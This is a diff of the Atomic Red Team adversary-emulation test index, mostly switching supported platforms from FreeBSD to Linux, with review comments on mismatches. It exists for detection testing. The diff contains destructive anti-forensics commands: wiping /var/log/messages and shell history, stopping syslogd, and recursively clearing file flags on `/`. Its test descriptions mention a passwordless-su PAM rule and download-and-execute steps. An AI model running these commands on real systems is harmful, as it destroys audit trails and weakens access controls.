- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

+140
-251
@@ -1037,7 +1037,7 @@ defense-evasion:

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
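Review bot: this hunk swaps `- freebsd` for `- linux` under `supported_platforms` but touches neither `path_to_pam_conf` nor the executor, and neither is visible here. Since the description says the test inserts a rule letting every user `su` to root without a password, confirm that the default for `path_to_pam_conf` and the inserted rule were checked against a Linux PAM stack before the platform is switched, and note in the PR which test in the index this corresponds to, because the platform change alone does not show that.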
@@ -1311,9 +1311,8 @@ defense-evasion:

'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
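Review bot: besides removing `- freebsd`, this hunk deletes `- macos` above `- linux` and re-adds it below, a pure reorder that turns a one-line change into three. Keep the existing order (`macos`, `linux`) unless the generator enforces sorting; the same pattern repeats in the next four chmod/chown hunks, and it is what makes the platform lists in the markdown indexes flip between `[macos, linux]` and `[linux, macos]`.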
@@ -1335,9 +1334,8 @@ defense-evasion:

'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -1359,9 +1357,8 @@ defense-evasion:

'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
@@ -1383,9 +1380,8 @@ defense-evasion:

'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -1460,9 +1456,8 @@ defense-evasion:

'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
owner:
description: Username of desired owner
@@ -1523,7 +1518,7 @@ defense-evasion:
Remove's a file's `immutable` attribute using `chflags`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- freebsd
- linux
input_arguments:
file_to_modify:
description: Path of the file
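Review bot: with `- freebsd` removed this test is Linux-only, yet the description line `Remove's a file's `immutable` attribute using `chflags`.` names `chflags`, the BSD/macOS utility; the markdown index in this same diff lists the test as `chattr - Remove immutable file attribute`, so the description should say `chattr`. While touching that line, "Remove's" should read "Removes".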
@@ -1572,7 +1567,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
@@ -1636,7 +1631,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
@@ -3164,7 +3159,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -3203,7 +3198,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -3242,7 +3237,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -3852,7 +3847,6 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
test_message:
|
||||
description: Test message to echo out to the screen
|
||||
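Review bot: the platform list here ends up as macos, linux, freebsd with `- freebsd` last, whereas every other hunk in this change puts `- freebsd` first; keep the ordering consistent so the lists are easy to scan and diff.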
@@ -4787,7 +4781,7 @@ defense-evasion:
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -4938,7 +4932,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
rm -rf /var/log/messages
|
||||
@@ -4997,7 +4991,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate
|
||||
--size=0 /var/log/security #size parameter \n"
|
||||
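Review bot: the second command in the executor, `truncate --size=0 /var/log/security`, mixes a GNU-only long option with a FreeBSD-only log path: FreeBSD's truncate(1) accepts `-s` but not `--size`, so it fails with an illegal-option error there, and on Linux `/var/log/security` does not normally exist (the equivalents are `/var/log/secure` or `/var/log/auth.log`), so GNU truncate would silently create an empty stray file instead of truncating a log. Use `-s 0` in both commands and make the log path an input argument.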
@@ -5042,7 +5036,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
cat /dev/null > /var/log/messages #truncating the file to zero bytes
|
||||
@@ -5116,7 +5110,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo '''' > /var/log/messages
|
||||
|
||||
@@ -5172,7 +5166,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'unlink /var/log/messages
|
||||
|
||||
@@ -7414,7 +7408,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'rm ~/.sh_history
|
||||
|
||||
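Review bot: `~/.sh_history` is the history file of the FreeBSD sh; on Linux `/bin/sh` is usually dash, which keeps no history, and interactive users run bash with `~/.bash_history`, so with `- linux` in supported_platforms this test removes a file that generally does not exist there. Consider making the history file path an input argument; the same applies to the following `.sh_history` hunks (echo, cat /dev/null, ln -sf, truncate).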
@@ -7438,7 +7432,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo "" > ~/.sh_history
|
||||
|
||||
@@ -7463,7 +7457,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /dev/null > ~/.sh_history
|
||||
|
||||
@@ -7488,7 +7482,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'ln -sf /dev/null ~/.sh_history
|
||||
|
||||
@@ -7512,7 +7506,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'truncate -s0 ~/.sh_history
|
||||
|
||||
@@ -7540,7 +7534,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
unset HISTFILE
|
||||
@@ -7618,7 +7612,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Install sshpass and create user account used for excuting
|
||||
|
||||
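Review bot: the dependency description reads "user account used for excuting"; "excuting" should be "executing".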
@@ -7961,7 +7955,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -7999,7 +7992,6 @@ defense-evasion:
|
||||
description: "Use Perl to decode a base64-encoded text string and echo it to
|
||||
the console \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -8067,7 +8059,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
message:
|
||||
description: Message to print to the screen
|
||||
@@ -8098,7 +8090,7 @@ defense-evasion:
|
||||
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
|
||||
for it. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
bash_encoded:
|
||||
description: Encoded
|
||||
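Review bot: the description line "Also a there is a great Sigma rule" has a stray article; it should read "Also, there is a great Sigma rule".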
@@ -8141,7 +8133,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9755,7 +9746,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9787,7 +9777,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9822,7 +9811,6 @@ defense-evasion:
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9849,7 +9837,6 @@ defense-evasion:
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -11175,7 +11162,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pfctl is installed on the machine.
|
||||
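Review bot: this block lists `- linux` under supported_platforms, but the dependency checks for `pfctl`, the Packet Filter control utility that ships with FreeBSD and macOS and is not available on Linux, so the prerequisite will always fail on Linux. Either drop `- linux` or state in the description that the test only runs on pf-based systems; the next hunk ("Add and delete a rule on the Packet Filter (PF)") has the same mismatch.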
@@ -11283,7 +11270,7 @@ defense-evasion:
|
||||
description: "Add and delete a rule on the Packet Filter (PF) if installed and
|
||||
enabled. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pf is installed on the machine and enabled.
|
||||
@@ -13706,9 +13693,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -13741,9 +13727,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -14938,7 +14923,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
@@ -14986,7 +14971,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
@@ -15031,7 +15016,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
@@ -15100,7 +15085,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -15114,7 +15098,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -16041,7 +16024,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
auditd_config_file_name:
|
||||
description: The name of the auditd configuration file to be changed
|
||||
@@ -16105,7 +16088,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
syslog_config_file_name:
|
||||
description: The name of the syslog configuration file to be changed
|
||||
@@ -18898,7 +18881,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
evil_command:
|
||||
description: Command to run after shell history collection is disabled
|
||||
@@ -18997,7 +18980,7 @@ defense-evasion:
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -19036,7 +19019,7 @@ defense-evasion:
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -20688,7 +20671,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
service syslogd stop
|
||||
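Review bot: `service syslogd stop` matches the FreeBSD service name; on most Linux distributions the daemon is `rsyslog` (or `syslog-ng`), so with `- linux` listed the command will report an unrecognised service and the test will not actually stop logging. Make the service name an input argument or branch on the platform.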
@@ -21582,7 +21565,6 @@ defense-evasion:
|
||||
as an additional \npayload to the compromised host and to make sure that there
|
||||
will be no recoverable data due to swap feature of FreeBSD/linux.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: "swapon -a \nsleep 2\nswapoff -a\nsync\n"
|
||||
@@ -22425,7 +22407,7 @@ defense-evasion:
|
||||
a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand
|
||||
uname -v\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
shell_command:
|
||||
description: command to encode
|
||||
@@ -23742,7 +23724,6 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, sh is renamed to `crond` and executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
@@ -24702,7 +24683,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
cert_filename:
|
||||
description: Path of the CA certificate we create
|
||||
@@ -25021,7 +25002,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -25053,7 +25033,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -25084,7 +25063,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -27350,7 +27328,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -27388,7 +27365,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -27577,7 +27553,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
chflags -R 0 /
|
||||
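Review bot: `chflags -R 0 /` does not exist on Linux, yet `- linux` is in supported_platforms for this executor; beyond the platform mismatch, recursively clearing every file flag from `/` on FreeBSD is not reversible from anything in this hunk, so please confirm there is a cleanup step or narrow the target to a test directory.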
@@ -28397,7 +28373,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir
|
||||
@@ -29406,7 +29382,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -31261,7 +31236,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -31302,7 +31277,7 @@ defense-evasion:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -31344,7 +31319,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -33926,7 +33901,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -33965,7 +33940,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -34004,7 +33979,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -35196,9 +35171,8 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -35256,7 +35230,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -38063,7 +38037,7 @@ privilege-escalation:
|
||||
Launch bash shell with command arg to create TRAP on EXIT.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -38106,7 +38080,7 @@ privilege-escalation:
|
||||
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -38865,7 +38839,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
@@ -38913,7 +38887,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
@@ -38958,7 +38932,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
@@ -39027,7 +39001,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -39041,7 +39014,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -43596,7 +43568,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command_to_add:
|
||||
description: Command to add to the .shrc file
|
||||
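Review bot: `.shrc` is read by the FreeBSD sh (through `ENV` set in `.profile`); bash on Linux does not read `~/.shrc`, so the persistence described by `command_to_add` would never fire on Linux even though `- linux` is listed. Either document that this variant is FreeBSD-specific or add the bash equivalent; the persistence copy of this test later in the diff has the same issue.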
@@ -43617,7 +43589,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -43640,7 +43611,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -45568,7 +45538,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -45864,7 +45834,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
rc_service_path:
|
||||
description: Path to rc service file
|
||||
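Review bot: the `rc_service_path` argument ("Path to rc service file") follows the FreeBSD rc.d service model; Linux systems running systemd have no rc service file to edit, so `- linux` looks inconsistent with the executor. Please state in the description which init system (rc.d versus SysV init or systemd) the test assumes.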
@@ -47322,7 +47292,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
@@ -47866,7 +47836,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -47907,7 +47877,7 @@ privilege-escalation:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -47949,7 +47919,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -50010,9 +49980,8 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -50070,7 +50039,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -53084,7 +53053,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -53109,7 +53077,6 @@ execution:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -53203,7 +53170,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53223,7 +53189,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53241,7 +53206,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53256,7 +53220,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53290,7 +53253,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -53337,7 +53300,7 @@ execution:
|
||||
with a /bin/sh shell, changes the users shell to sh, then deletes the art
|
||||
user. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'chsh - change login shell, must be installed
|
||||
|
||||
@@ -53389,7 +53352,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -53450,7 +53413,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
@@ -54089,7 +54052,6 @@ execution:
|
||||
description: Download and execute shell script and write to file then execute
|
||||
locally using Python -c (command mode)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
script_url:
|
||||
@@ -54131,7 +54093,6 @@ execution:
|
||||
description: Create Python file (.py) that downloads and executes shell script
|
||||
via executor arguments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -54189,7 +54150,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -54254,7 +54214,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Verify if python is in the environment variable path and attempt
|
||||
@@ -55573,7 +55532,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
@@ -56632,7 +56591,7 @@ persistence:
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
@@ -58667,9 +58626,8 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -58727,7 +58685,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -60348,7 +60306,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -60366,7 +60323,6 @@ persistence:
|
||||
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
|
||||
description: Install the "Minimum Viable Malicious Extension" Chrome extension
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -60383,7 +60339,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -62672,7 +62627,7 @@ persistence:
|
||||
Launch bash shell with command arg to create TRAP on EXIT.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -62715,7 +62670,7 @@ persistence:
|
||||
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
|
